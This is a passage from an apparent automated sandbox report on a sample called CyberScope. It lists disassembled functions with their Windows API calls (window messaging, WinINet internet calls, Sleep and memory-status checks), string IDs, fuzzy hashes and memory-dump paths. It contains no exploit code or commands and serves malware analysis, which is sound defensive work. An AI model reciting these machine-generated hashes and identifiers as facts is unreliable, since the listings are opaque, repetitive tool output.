                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Connection_wcslen
                                                                                    • String ID: *$LPT
                                                                                    • API String ID: 1725874428-3443410124
                                                                                    • Opcode ID: fc909b8ed77da3a86f7370563ed995aa54479f69f4cdf7601b0ab1af08d1a86d
                                                                                    • Instruction ID: 5eb34a428b10355dcae0a2d7d9616105a883e633cb3a0926ec6dde238a9587f8
                                                                                    • Opcode Fuzzy Hash: fc909b8ed77da3a86f7370563ed995aa54479f69f4cdf7601b0ab1af08d1a86d
                                                                                    • Instruction Fuzzy Hash: 44916A75A10615DFCB14DF54C494EAABBF1AF48314F188099E84A9F3A2C771EE86CF90
                                                                                    APIs
                                                                                    • OleSetContainedObject.OLE32(?,00000001), ref: 001F58AF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: ContainedObject
                                                                                    • String ID: 0$&$Container
                                                                                    • API String ID: 3565006973-2566903554
                                                                                    • Opcode ID: b6191d088a8948ec77597f6eec64a026484df811374c1fd55109769d25e24a9e
                                                                                    • Instruction ID: 92144350f470b0b801aa830c02898841887a65c32b5301868fe75f3626fc6199
                                                                                    • Opcode Fuzzy Hash: b6191d088a8948ec77597f6eec64a026484df811374c1fd55109769d25e24a9e
                                                                                    • Instruction Fuzzy Hash: 37815A70600605EFDB14DF58C884AAABBF9FF48714F10856EFA4ACB691DBB0E845CB50
                                                                                    APIs
                                                                                    • __startOneArgErrorHandling.LIBCMT ref: 001BE67D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorHandling__start
                                                                                    • String ID: pow
                                                                                    • API String ID: 3213639722-2276729525
                                                                                    • Opcode ID: 405ee20e2893034d9b6564273093270f99885240f50145171ecf3b1e2916a7a4
                                                                                    • Instruction ID: fa3b1f4a0e899b1621d704d6771807bc31d53ff782ecfe7ee5b2640204b57c85
                                                                                    • Opcode Fuzzy Hash: 405ee20e2893034d9b6564273093270f99885240f50145171ecf3b1e2916a7a4
                                                                                    • Instruction Fuzzy Hash: 17517A61E081028ACB15BB14DD85BFA3BE0AB70750F384D5CF095822E9EF35CD969A86
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: #
                                                                                    • API String ID: 0-1885708031
                                                                                    • Opcode ID: 7e5e8fd713e7626786a093cc23ee19eeb62fd74808af9a73add13217835cd3f6
                                                                                    • Instruction ID: e6aa8f262feb0e21eb7eb7b78110eaee410f03978fa2801945cdca3d5d443a05
                                                                                    • Opcode Fuzzy Hash: 7e5e8fd713e7626786a093cc23ee19eeb62fd74808af9a73add13217835cd3f6
                                                                                    • Instruction Fuzzy Hash: 48513135504286DFCF2ADF29C441BBE7BA4EF26314FA54059F8959B2D0DB309E82CB61
                                                                                    APIs
                                                                                    • Sleep.KERNEL32(00000000), ref: 001AF6DB
                                                                                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 001AF6F4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: GlobalMemorySleepStatus
                                                                                    • String ID: @
                                                                                    • API String ID: 2783356886-2766056989
                                                                                    • Opcode ID: 6f893b9a0408e1779eab916b6cb47d7762f2255f40ae4219566910783aa519ed
                                                                                    • Instruction ID: 0dc4542c69f7ced6b692b6ff22c6ced3bfa224ad287211c0932d345a4255169a
                                                                                    • Opcode Fuzzy Hash: 6f893b9a0408e1779eab916b6cb47d7762f2255f40ae4219566910783aa519ed
                                                                                    • Instruction Fuzzy Hash: 37515871408748DBD720AF51DC86BAFBBE8FFA5304F81885DF1D9821A5DB308529CB66
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: BuffCharUpper_wcslen
                                                                                    • String ID: CALLARGARRAY
                                                                                    • API String ID: 157775604-1150593374
                                                                                    • Opcode ID: 3c02177371f237997da9705c74e05788f73384c19552888ed11a0122c6b268f5
                                                                                    • Instruction ID: d1a78aabf132a12af9aa1467d9204fa9685844eb962cdc6500a3e7f8ac4d9c97
                                                                                    • Opcode Fuzzy Hash: 3c02177371f237997da9705c74e05788f73384c19552888ed11a0122c6b268f5
                                                                                    • Instruction Fuzzy Hash: 7741D031E102199FCB00DFA8C8899FEBBF5FF69324F10406AE806A7251E7719D91CB90
                                                                                    APIs
                                                                                    • _wcslen.LIBCMT ref: 0020DB75
                                                                                    • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 0020DB7F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: CrackInternet_wcslen
                                                                                    • String ID: |
                                                                                    • API String ID: 596671847-2343686810
                                                                                    • Opcode ID: 7910c249a669b5cc8da4a6def68953fbb2223f86e2f75fffb7f4393d3dca7a7c
                                                                                    • Instruction ID: 22d74568f8220c74accaade230a4f6fcd0ab6f7afe60ed50a0a64c17210a7169
                                                                                    • Opcode Fuzzy Hash: 7910c249a669b5cc8da4a6def68953fbb2223f86e2f75fffb7f4393d3dca7a7c
                                                                                    • Instruction Fuzzy Hash: C6315E71C11219ABDF15EFA4CC85EEEBFB9FF15304F100029F915A6162EB719A16CB60
                                                                                    APIs
                                                                                    • DestroyWindow.USER32(?,?,?,?), ref: 002240BD
                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 002240F8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$DestroyMove
                                                                                    • String ID: static
                                                                                    • API String ID: 2139405536-2160076837
                                                                                    • Opcode ID: e741449c5faaad382336c806cbb03712168833a03bea306c8d99c4581ffa91f8
                                                                                    • Instruction ID: 7f6a03e038a0d87ffa46262a77fe5d669506a5d294e6e60910075f9888475b43
                                                                                    • Opcode Fuzzy Hash: e741449c5faaad382336c806cbb03712168833a03bea306c8d99c4581ffa91f8
                                                                                    • Instruction Fuzzy Hash: C831B071120614AADB24DFB8DC80BFB73A9FF48724F008619F9A987190CA71AD91CB60
                                                                                    APIs
                                                                                    • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 002250BD
                                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 002250D2
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID: '
                                                                                    • API String ID: 3850602802-1997036262
                                                                                    • Opcode ID: 2550a4e92cec83edbce3752d34346885fccc9bc134e8168bb75d8e1655d64e38
                                                                                    • Instruction ID: c91716918204ca9a07340d0706ee47521767bfe72c88b03c2d4eb677d49d8759
                                                                                    • Opcode Fuzzy Hash: 2550a4e92cec83edbce3752d34346885fccc9bc134e8168bb75d8e1655d64e38
                                                                                    • Instruction Fuzzy Hash: FD311A74A1172AAFDB14CFA5D880BDE7BB5FF49300F108069E904AB351D771AA55CF90
                                                                                    APIs
                                                                                      • Part of subcall function 0019249F: GetWindowLongW.USER32(00000000,000000EB), ref: 001924B0
                                                                                      • Part of subcall function 00192234: GetWindowLongW.USER32(?,000000EB), ref: 00192242
                                                                                    • GetParent.USER32(?), ref: 001D3440
                                                                                    • DefDlgProcW.USER32(?,00000133,?,?,?,?), ref: 001D34CA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: LongWindow$ParentProc
                                                                                    • String ID: (&
                                                                                    • API String ID: 2181805148-1801568203
                                                                                    • Opcode ID: a6ed8adf76807c89c2a50d11c3ec99f32698b58d5ff65e7e3e464d5b6d9ce22a
                                                                                    • Instruction ID: a840849b8601b6b669dc96cb49e3b75611a27f5e32046e3e07a17128929e27ab
                                                                                    • Opcode Fuzzy Hash: a6ed8adf76807c89c2a50d11c3ec99f32698b58d5ff65e7e3e464d5b6d9ce22a
                                                                                    • Instruction Fuzzy Hash: 1221BC31201144BFCF2A9F68DC49DB93BA6EF06360F244255F6254B3E2C3359E66DB11
                                                                                    APIs
                                                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00223D18
                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00223D23
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID: Combobox
                                                                                    • API String ID: 3850602802-2096851135
                                                                                    • Opcode ID: 52953b17b69bc4681385b01e56d3af383679aab32ad7e9e7e764834d04a6bd25
                                                                                    • Instruction ID: d2f76fde7a4c61b18d0d40a780844af1c8c1d030af9103fbf746210840ea3b21
                                                                                    • Opcode Fuzzy Hash: 52953b17b69bc4681385b01e56d3af383679aab32ad7e9e7e764834d04a6bd25
                                                                                    • Instruction Fuzzy Hash: 2811E6717201197FEF11CF94EC80FBB3B6AEB843A4F104125F914A7290D675DD618BA0
                                                                                    APIs
                                                                                      • Part of subcall function 00197873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 001978B1
                                                                                      • Part of subcall function 00197873: GetStockObject.GDI32(00000011), ref: 001978C5
                                                                                      • Part of subcall function 00197873: SendMessageW.USER32(00000000,00000030,00000000), ref: 001978CF
                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00224216
                                                                                    • GetSysColor.USER32(00000012), ref: 00224230
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                    • String ID: static
                                                                                    • API String ID: 1983116058-2160076837
                                                                                    • Opcode ID: 4df8b022e50526b9766c9317f5c7650bc445a48cf25ec6feb7c3c4207d5fed77
                                                                                    • Instruction ID: 8069bba8d00e2195510aa83bb94be758f77c333b9826f43a778620dc04a41049
                                                                                    • Opcode Fuzzy Hash: 4df8b022e50526b9766c9317f5c7650bc445a48cf25ec6feb7c3c4207d5fed77
                                                                                    • Instruction Fuzzy Hash: 8F11267262021ABFDB10DFE9EC49AFA7BA8EB08314F015A14FD55E3250D674E8619B60
                                                                                    APIs
                                                                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0020D7C2
                                                                                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0020D7EB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Internet$OpenOption
                                                                                    • String ID: <local>
                                                                                    • API String ID: 942729171-4266983199
                                                                                    • Opcode ID: 5cfa0ca0f0abba5b4e1067b05075858aef748ea96d589d33782d9f08c526be0e
                                                                                    • Instruction ID: 3109f5469170b956c79a36fadb457fa263470947d141f4b47e5537b226525926
                                                                                    • Opcode Fuzzy Hash: 5cfa0ca0f0abba5b4e1067b05075858aef748ea96d589d33782d9f08c526be0e
                                                                                    • Instruction Fuzzy Hash: 5C110671162332B9D7344FA28C49EF7FE9CEB127A4F00422AB509820D1D2A48850C2F0
                                                                                    APIs
                                                                                      • Part of subcall function 0019B329: _wcslen.LIBCMT ref: 0019B333
                                                                                    • CharUpperBuffW.USER32(?,?,?), ref: 001F761D
                                                                                    • _wcslen.LIBCMT ref: 001F7629
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen$BuffCharUpper
                                                                                    • String ID: STOP
                                                                                    • API String ID: 1256254125-2411985666
                                                                                    • Opcode ID: 9a87b4c6a332ca01b94b4941b7d8aecacb760983d2704adaaf1b591d751f7c84
                                                                                    • Instruction ID: b9ba48256fe57fe374b14a41d83ca91e94f4d30ff0ed8917cc3bdc583f83c8c0
                                                                                    • Opcode Fuzzy Hash: 9a87b4c6a332ca01b94b4941b7d8aecacb760983d2704adaaf1b591d751f7c84
                                                                                    • Instruction Fuzzy Hash: EA01C032A1892A8BEB20AFFDDC849BF77B5BBA07647500524E921D72D1EB31D904C690
                                                                                    APIs
                                                                                      • Part of subcall function 0019B329: _wcslen.LIBCMT ref: 0019B333
                                                                                      • Part of subcall function 001F45FD: GetClassNameW.USER32(?,?,000000FF), ref: 001F4620
                                                                                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 001F2699
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClassMessageNameSend_wcslen
                                                                                    • String ID: ComboBox$ListBox
                                                                                    • API String ID: 624084870-1403004172
                                                                                    • Opcode ID: b08e9634e1709bb61fb078d356cdb5d64593297c6574875bc08695302e9f907c
                                                                                    • Instruction ID: 48d03c20c00c4684a74bdf4f09d23f0dcc58e68748e40424e2bc9b6c094e3325
                                                                                    • Opcode Fuzzy Hash: b08e9634e1709bb61fb078d356cdb5d64593297c6574875bc08695302e9f907c
                                                                                    • Instruction Fuzzy Hash: 8701B175A05218ABCB08EBA4DC95CFE77A8FF56364B400619E932A72D1DB31590DCA50
                                                                                    APIs
                                                                                      • Part of subcall function 0019B329: _wcslen.LIBCMT ref: 0019B333
                                                                                      • Part of subcall function 001F45FD: GetClassNameW.USER32(?,?,000000FF), ref: 001F4620
                                                                                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 001F2593
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClassMessageNameSend_wcslen
                                                                                    • String ID: ComboBox$ListBox
                                                                                    • API String ID: 624084870-1403004172
                                                                                    • Opcode ID: 9309b7f38df970f7006b9e1ba88ea8f266ffcaa0a83dddcf036541e2416d7ab2
                                                                                    • Instruction ID: 2592e9a1f819a1902e4befa2dae2ae6052a6860f9b618d02b3d5b2ce5d8611af
                                                                                    • Opcode Fuzzy Hash: 9309b7f38df970f7006b9e1ba88ea8f266ffcaa0a83dddcf036541e2416d7ab2
                                                                                    • Instruction Fuzzy Hash: 1201A275A41108ABCF04E7A0D966EFF77A9DF66345F500029BA02A3291DB709F0DC6B1
                                                                                    APIs
                                                                                      • Part of subcall function 0019B329: _wcslen.LIBCMT ref: 0019B333
                                                                                      • Part of subcall function 001F45FD: GetClassNameW.USER32(?,?,000000FF), ref: 001F4620
                                                                                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 001F2615
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClassMessageNameSend_wcslen
                                                                                    • String ID: ComboBox$ListBox
                                                                                    • API String ID: 624084870-1403004172
                                                                                    • Opcode ID: ba02163f8faa4a5aa9a9de350b357454fc2fcff47051a224a3da78618bda6c84
                                                                                    • Instruction ID: 7396aff40e2d6a31b8ddd0774bfe0e3bf4c23ae669c4d92edd62525a2cb82938
                                                                                    • Opcode Fuzzy Hash: ba02163f8faa4a5aa9a9de350b357454fc2fcff47051a224a3da78618bda6c84
                                                                                    • Instruction Fuzzy Hash: CD01AD75A441086BCF15EBA0EA46EFF77A89B26354F500026BD02F3281DB759E09D6B2
                                                                                    APIs
                                                                                      • Part of subcall function 0019B329: _wcslen.LIBCMT ref: 0019B333
                                                                                      • Part of subcall function 001F45FD: GetClassNameW.USER32(?,?,000000FF), ref: 001F4620
                                                                                    • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 001F2720
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClassMessageNameSend_wcslen
                                                                                    • String ID: ComboBox$ListBox
                                                                                    • API String ID: 624084870-1403004172
